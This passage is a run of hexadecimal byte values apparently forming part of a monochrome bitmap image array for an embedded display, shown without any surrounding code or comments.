0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFE,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFE,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0X80,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X80,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
